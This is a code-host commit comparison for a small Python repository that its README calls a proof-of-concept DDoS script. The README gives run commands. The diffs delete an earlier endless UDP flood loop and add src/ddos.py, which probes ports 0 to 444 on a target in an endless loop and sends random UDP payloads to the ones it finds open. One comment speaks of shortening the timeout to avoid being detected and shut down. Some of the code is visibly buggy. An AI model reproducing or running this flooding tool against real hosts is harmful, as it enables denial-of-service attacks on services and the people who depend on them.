Compare commits
6 commits
refactor/t
...
main
Author | SHA1 | Date | |
---|---|---|---|
|
e06eda5e18 | ||
|
7250e1744f | ||
|
c63c41ef3d | ||
|
6bad62b00f | ||
|
2ded4f6972 | ||
|
9ece63b941 |
8 changed files with 164 additions and 126 deletions
51
README.md
51
README.md
|
@ -1 +1,52 @@
|
|||
|
||||
# Simple DDoS
|
||||
|
||||
A simple proof of concept DDoS script written in Python.
|
||||
|
||||
|
||||
|
||||
![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/w/twhite96/ddos-script?style=for-the-badge&logo=github&logoColor=%23fff&labelColor=%23000&color=%23fff)
|
||||
![GitHub followers](https://img.shields.io/github/followers/twhite96?style=for-the-badge&logo=github&logoColor=%23fff&labelColor=%23000&color=%23fff)
|
||||
|
||||
![Keybase PGP](https://img.shields.io/keybase/pgp/0x8c?style=for-the-badge&logo=keybase&labelColor=%23000&color=%2344AD42)
|
||||
![Mastodon Follow](https://img.shields.io/mastodon/follow/110494047736700791?domain=https%3A%2F%2Finfosec.exchange&style=for-the-badge&labelColor=%23000&color=%2344ad42)
|
||||
|
||||
|
||||
|
||||
## Acknowledgements
|
||||
|
||||
- [Craig Lang](https://www.linkedin.com/in/craiglang42/): for his valuable pairing sessions
|
||||
- [Tae'Lur Alexis's Port Scanner](https://github.com/cyberbarbie/cute-little-port-scanner): looking at the code helped me quit spinning my wheels with over-engineering
|
||||
|
||||
|
||||
## Usage/Examples
|
||||
|
||||
To use:
|
||||
|
||||
Clone the repo:
|
||||
|
||||
```sh
|
||||
$ git clone https://github.com/twhite96/ddos-script.git
|
||||
```
|
||||
|
||||
then cd into the `src` directory...
|
||||
|
||||
```sh
|
||||
$ cd src
|
||||
```
|
||||
|
||||
```sh
|
||||
$ python3 ddos.py <hostname> <port>
|
||||
```
|
||||
|
||||
|
||||
## FAQ
|
||||
|
||||
#### Well it didn't work!
|
||||
|
||||
I know. You'd need to feed more bytes into the `randbytes(4000)` method, as I am only sending 4kb. This is a v1 of a proof of concept.
|
||||
|
||||
#### Where the hell are the tests??
|
||||
|
||||
Soon, young Padawan.
|
||||
|
||||
|
|
|
@ -2,4 +2,4 @@
|
|||
# simple_ddos/__init__.py
|
||||
|
||||
__app_name__ = 'simple_ddos'
|
||||
__version__ = "0.1.0"
|
||||
__version__ = "0.1.0"
|
|
@ -1,4 +0,0 @@
|
|||
typer==0.3.2
|
||||
colorama==0.4.4
|
||||
shellingham==1.4.0
|
||||
pytest==6.2.4
|
|
@ -1,99 +0,0 @@
|
|||
"""Top-level package for Simple DDoS."""
|
||||
# simple_ddos/py_ddos.py
|
||||
|
||||
|
||||
import os
|
||||
import platform
|
||||
import random
|
||||
import ipaddress
|
||||
from ipaddress import IPv4Address
|
||||
|
||||
import typer
|
||||
|
||||
# import threading
|
||||
import socket
|
||||
|
||||
# TODO: Read docs on time, os, random, threading, and platform
|
||||
# TODO: Take questions to Mastodon
|
||||
# TODO: Eat good food
|
||||
# TODO: Get plenty of water and sleep
|
||||
|
||||
|
||||
# v1: just create ddos script
|
||||
|
||||
# Instead of using SOCK_STREAM for TCP connections
|
||||
# using SOCK_DGRAM for UDP connections to keep packets small
|
||||
# If iterating on this, will use SOCK_STREAM to send bigger packets if I actually understand
|
||||
# what that means for the network being hit
|
||||
|
||||
# Is there enough precedent with ipv6 addresses to use socket.AF_INET6?
|
||||
# How would that work?
|
||||
|
||||
# TODO: research ipv6
|
||||
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
|
||||
bytes1 = random.randbytes(2000)
|
||||
bytes2 = random.randbytes(2900)
|
||||
system = platform.uname().system
|
||||
|
||||
# this is better system = getattr(platform.uname(), "system")
|
||||
# instead of hardcoding a specific index
|
||||
# because if something in the l
|
||||
|
||||
|
||||
def check_os():
|
||||
if system == 'Windows':
|
||||
os.system("cls")
|
||||
elif system == 'Unix':
|
||||
os.system("clear")
|
||||
|
||||
|
||||
# call function to check what system is used
|
||||
|
||||
# Why use a try
|
||||
|
||||
def ddos(target, port, ip: bool = False):
|
||||
sent = 0
|
||||
try:
|
||||
while True:
|
||||
net = socket.gethostbyname(target)
|
||||
sock.sendto(bytes1, (net, port))
|
||||
sent = sent + 1
|
||||
|
||||
print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port))
|
||||
while True:
|
||||
net2 = socket.gethostbyname(target)
|
||||
sock.sendto(bytes2, (net2, port))
|
||||
sent = sent + 1
|
||||
print("Sending %s packets to %s through port:%s" % (sent, ipaddress, port))
|
||||
|
||||
# Break out of infinite loop
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print('\n' + 'Keyboard Interrupt. Terminating session...')
|
||||
|
||||
except socket.gaierror:
|
||||
print('Unknown address.')
|
||||
print('Please input the correct ip address.')
|
||||
|
||||
except NameError:
|
||||
print('Unknown address.')
|
||||
print('Please input the correct ip address.')
|
||||
|
||||
# For introducing to the script later
|
||||
|
||||
# for i in range(150):
|
||||
# thread = threading.Thread(target=ddos)
|
||||
# thread.start()
|
||||
|
||||
# This is the line I use to run this script:
|
||||
# python py_ddos.py "192.168.xx.xxx" "port"
|
||||
# This is the Error:
|
||||
# sock.sendto(bytes1, (net, port))
|
||||
# TypeError: 'str' object cannot be interpreted as an integer
|
||||
# What am I missing here?
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
typer.run(ddos)
|
|
@ -1,10 +0,0 @@
|
|||
import unittest
|
||||
|
||||
|
||||
class MyTestCase(unittest.TestCase):
|
||||
def test_something(self):
|
||||
self.assertEqual(True, False) # add assertion here
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main()
|
|
@ -1,12 +0,0 @@
|
|||
# tests/test_rptodo.py
|
||||
|
||||
from typer.testing import CliRunner
|
||||
|
||||
from simpleDDoS import __app_name__, __version__, cli
|
||||
|
||||
runner = CliRunner()
|
||||
|
||||
def test_version():
|
||||
result = runner.invoke(cli.app, ["--version"])
|
||||
assert result.exit_code == 0
|
||||
assert f"{__app_name__} v{__version__}\n" in result.stdout
|
112
src/ddos.py
Normal file
112
src/ddos.py
Normal file
|
@ -0,0 +1,112 @@
|
|||
import sys, socket
|
||||
import random
|
||||
from datetime import datetime as dt
|
||||
|
||||
# os.system('figlet Simple DDoS | lolcat')
|
||||
|
||||
# TODO: Read docs on time, os, random, threading, and platform
|
||||
# TODO: Take questions to Mastodon
|
||||
# TODO: Eat good food
|
||||
# TODO: Get plenty of water and sleep
|
||||
|
||||
|
||||
# ANSI colors with proper escape
|
||||
R = '\033[31m'
|
||||
G = '\033[32m'
|
||||
C = '\033[36m'
|
||||
W = '\033[0m'
|
||||
|
||||
|
||||
# v1: just create ddos script
|
||||
|
||||
# Instead of using SOCK_STREAM for TCP connections
|
||||
# using SOCK_DGRAM for UDP connections to keep packets small
|
||||
# If iterating on this, will use SOCK_STREAM to send bigger packets if I actually understand
|
||||
# what that means for the network being hit
|
||||
|
||||
# Is there enough precedent with ipv6 addresses to use socket.AF_INET6?
|
||||
# How would that work?
|
||||
|
||||
# TODO: research ipv6
|
||||
|
||||
|
||||
# this is better system = getattr(platform.uname(), "system")
|
||||
# instead of hardcoding a specific index
|
||||
# because if something in the l
|
||||
|
||||
|
||||
def ddos(target, port):
|
||||
sent = 0
|
||||
if len(sys.argv) != 3:
|
||||
print('\n' + R + '[!]' + R + 'Invalid amount of arguments')
|
||||
print('\n' + 'Syntax: python3 ddos.py <ip> <port>')
|
||||
|
||||
print("-" * 25)
|
||||
print(f"Attacking target:{target} on {port}")
|
||||
print("Time started:" + str(dt.now()))
|
||||
else:
|
||||
socket.gethostbyname(sys.argv[1])
|
||||
|
||||
try:
|
||||
# create an infinite loop to continuously send junk data
|
||||
# to target ip
|
||||
while True:
|
||||
# Create a new socket
|
||||
# assign socket to s
|
||||
|
||||
# Iterate over ports to find the open ones on
|
||||
# common DNS protocol ports
|
||||
for port in range(0,445):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
|
||||
# Set the timeout for 5 seconds
|
||||
|
||||
# I changed it from 5 seconds to 1
|
||||
# because each iteration over a port should not
|
||||
# take more than 1 second
|
||||
# If it did, perhaps it would be detected
|
||||
# quickly and shutdown
|
||||
|
||||
socket.setdefaulttimeout(1)
|
||||
|
||||
# Connect to target and port
|
||||
# using connect_ex to raise an
|
||||
# exception instead of just s.connect
|
||||
|
||||
# Assign the connection a variable res
|
||||
res = s.connect_ex((target, port))
|
||||
|
||||
if res != 1:
|
||||
pass
|
||||
# Check open ports by
|
||||
#
|
||||
else:
|
||||
print(f"Port {port} is open on {target}")
|
||||
print("Connected")
|
||||
# create a variable that will send 4000 random bytes
|
||||
|
||||
# 4000 bytes is not enough to DDoS a target.
|
||||
# Will need to test with more.
|
||||
|
||||
bytes1: bytes = random.randbytes(4000)
|
||||
# bytes2 = random.randbytes(4000)
|
||||
# system = platform.uname().system
|
||||
|
||||
# send 4000 random bytes to the target on port passed as arg
|
||||
s.sendto(bytes1, (target, port))
|
||||
sent = sent + 1
|
||||
|
||||
# Break out of infinite loop
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print('\n' + R + '[!]' + C + 'Terminating Session...' + W)
|
||||
sys.exit()
|
||||
|
||||
except socket.gaierror:
|
||||
print(R + '[-] ' + C + 'Unknown address.')
|
||||
print(R + '[-] ' + C + 'Please input the correct ip address.')
|
||||
sys.exit()
|
||||
|
||||
except socket.error:
|
||||
print(R + '[-] ' + C + "Couldn't connect to server.")
|
||||
socket.close()
|
Loading…
Reference in a new issue